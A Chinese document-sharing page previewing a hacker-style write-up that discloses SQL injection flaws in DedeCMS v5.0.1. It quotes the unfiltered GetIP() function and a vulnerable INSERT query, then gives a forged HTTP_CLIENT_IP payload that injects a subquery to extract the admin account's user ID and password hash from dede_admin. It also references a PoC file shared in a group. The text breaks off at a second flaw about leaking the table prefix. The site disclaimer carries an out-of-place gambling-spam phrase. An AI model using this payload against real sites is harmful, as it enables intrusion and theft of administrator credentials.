Dedecms v501多个0day漏洞暴光.doc

  1. 1、本文档共5页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
Dedecms v501多个0day漏洞暴光

Dedecms v5.0.1多个0day漏洞暴光 Flyh4t 漏洞一:又见getiP() 比较经典的一段漏洞代码出现\include\inc_functions.php中数次将这个函数的结果直接入库,造成了很多处注射漏洞。当然,这个漏洞在dedecms4中也一直存在 :) -------------------------------------------------------------------------------------------------------------------- //\include\inc_functions.php function GetIP(){//该函数中的$_SERVER变量没有过滤,而且php5环境下不受gpc 影响 if(!empty($_SERVER[HTTP_CLIENT_IP])) $cip = $_SERVER[HTTP_CLIENT_IP]; else if(!empty($_SERVER[HTTP_X_FORWARDED_FOR])) $cip = $_SERVER[HTTP_X_FORWARDED_FOR]; else if(!empty($_SERVER[REMOTE_ADDR])) $cip = $_SERVER[REMOTE_ADDR]; else $cip = 无法获取!; return $cip; } ---------------------------------------------------------------------------------------------------------------------- 这个类型的漏洞已经很多了,我不再详细写了,只拿其中一处写了个poc方面理解:) ------------------------------------------------------------------------------------------------- // \member\story_add_action.php (30) $userip = getip(); $inQuery = INSERT INTO `#@__story_books`(`catid`,`bcatid`,`booktype`,`iscommend`,`click`,`freenum`,`bookname`, `author`,`memberid`,`litpic`,`pubdate`,`ischeck`,`status`, `lastpost`,`postnum`,`lastfeedback`,`fedbacknum`,`weekcc`,`monthcc`,`weekup`,`monthup`, `description`,`body`,`keywords`,`userip`,`senddate` ) VALUES ($catid,$bcatid,$booktype, $iscommend, 0, $freenum, $bookname, $author, {$cfg_ml-M_ID}, $litpic, $pubdate, $ischeck, 0, 0, 0, 0, 0, 0, 0, 0, 0, $description , $body , $keywords, $userip,.mytime().); ;10 ---------------------------------------------------------------------------------------------- 只要伪造HTTP_CLIENT_IP 为11,1173448061),(1, 0, 0, 0, 1, 6,(SELECT concat( userid, 0x5f, pwd, 0x5f, uname ) FROM dede_admin WHERE id =1), flyh4t, 3, 0, 1173448047, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, flyh4t, flyh4t, flyh4t, 即可以注射这个漏洞了(不过这里要求mysql4=4.1,这个版本以上的支持子查询),具体的参考群共享里面的poc.。(dedecms_0day_poc.php) 漏洞二:暴数据库表前缀 这个漏洞和漏洞一是天生的一对,在用户修改了了表前缀的情况下我们的sql注射很难利用起来,但是这个漏洞给了我们一个机会 :) 看代码: ---------------------------------------------------------------------------------

文档评论(0)

zhuwenmeijiale + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

版权声明书
用户编号:7065136142000003

1亿VIP精品文档

相关文档